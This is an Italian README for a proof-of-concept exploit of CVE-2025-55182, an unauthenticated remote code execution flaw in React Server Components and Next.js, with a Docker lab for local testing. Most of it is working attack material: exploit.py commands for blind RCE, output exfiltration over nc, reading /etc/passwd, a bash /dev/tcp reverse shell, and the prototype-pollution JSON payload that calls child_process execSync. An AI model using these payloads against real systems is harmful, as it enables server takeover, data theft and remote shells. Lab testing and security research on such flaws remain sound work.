
CVE-2025-55182 React2Shell PoC
Un exploit proof of concept per CVE-2025-55182, una vulnerabilità critica (CVSS 10.0) di esecuzione remota di codice non autenticata nei React Server Components.
Scoperta da Lachlan Davidson - Divulgata al team Meta/React il 29 novembre 2025.
La vulnerabilità risiede nella logica di deserializzazione del protocollo React Flight. Inviando un payload dannoso tramite HTTP POST, un attaccante può ottenere un inquinamento del prototipo (prototype pollution) che porta all'esecuzione arbitraria di codice sul server.
| Pacchetto | Versioni Vulnerabili |
|---|
| react-server-dom-webpack | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-parcel | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-turbopack | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| Next.js | 15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6 |
.
├── exploit.py # exploit script
├── docker-compose.yml # Vulnerable test environment
├── vulnerable-app/ # Vulnerable Next.js application
└── README.md
docker compose up -d
Questo avvia un'applicazione Next.js vulnerabile su http://localhost:3000.
python3 exploit.py -u http://localhost:3000 --check
Esegue un controllo non sfruttabile per indicatori tra cui:
python3 exploit.py -u http://localhost:3000 -c "id"
Esegue un comando senza vedere l'output. Verifica con:
python3 exploit.py -u http://localhost:3000 -c "id" --exfil <IP>:<PORT>
Il tuo indirizzo IP; Porta su cui ascoltare
usage: exploit.py [-h] -u URL [-c COMMAND] [--check] [--exfil HOST:PORT]
[--timeout TIMEOUT] [--no-verify]
options:
-u, --url URL Target URL
-c, --command CMD Command to execute
--check Check if vulnerable (non-exploitative)
--exfil HOST:PORT Exfiltrate output to HOST:PORT
--timeout TIMEOUT Request timeout (default: 10)
--no-verify Disable SSL verification
# Check vulnerability
python3 exploit.py -u http://localhost:3000 --check
# Blind RCE
python3 exploit.py -u http://localhost:3000 -c "touch /tmp/pwned"
# RCE with output
python3 exploit.py -u http://localhost:3000 -c "whoami" --exfil 172.17.0.1:9999
# Read files
python3 exploit.py -u http://localhost:3000 -c "cat /etc/passwd" --exfil 172.17.0.1:9999
# Reverse shell
python3 exploit.py -u http://localhost:3000 -c "bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\": \"$B0\"}",
"_response": {
"_prefix": "process.mainModule.require('child_process').execSync('id');",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
L'exploit corrompe lo stato del server durante l'esecuzione, rendendo inaffidabile l'esfiltrazione della risposta in banda. Il flag --exfil utilizza l'esfiltrazione fuori banda:
┌──────────┐ 1. Malicious POST ┌──────────┐
│ Attacker │ ──────────────────► │ Server │
└──────────┘ └──────────┘
▲ │
│ 3. Command output │ 2. RCE executes:
│ via nc │ cmd | nc attacker port
│ ▼
└─────────────────────────────────┘
docker compose down
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi educativi. Utilizzalo solo contro sistemi per cui hai il permesso di testare.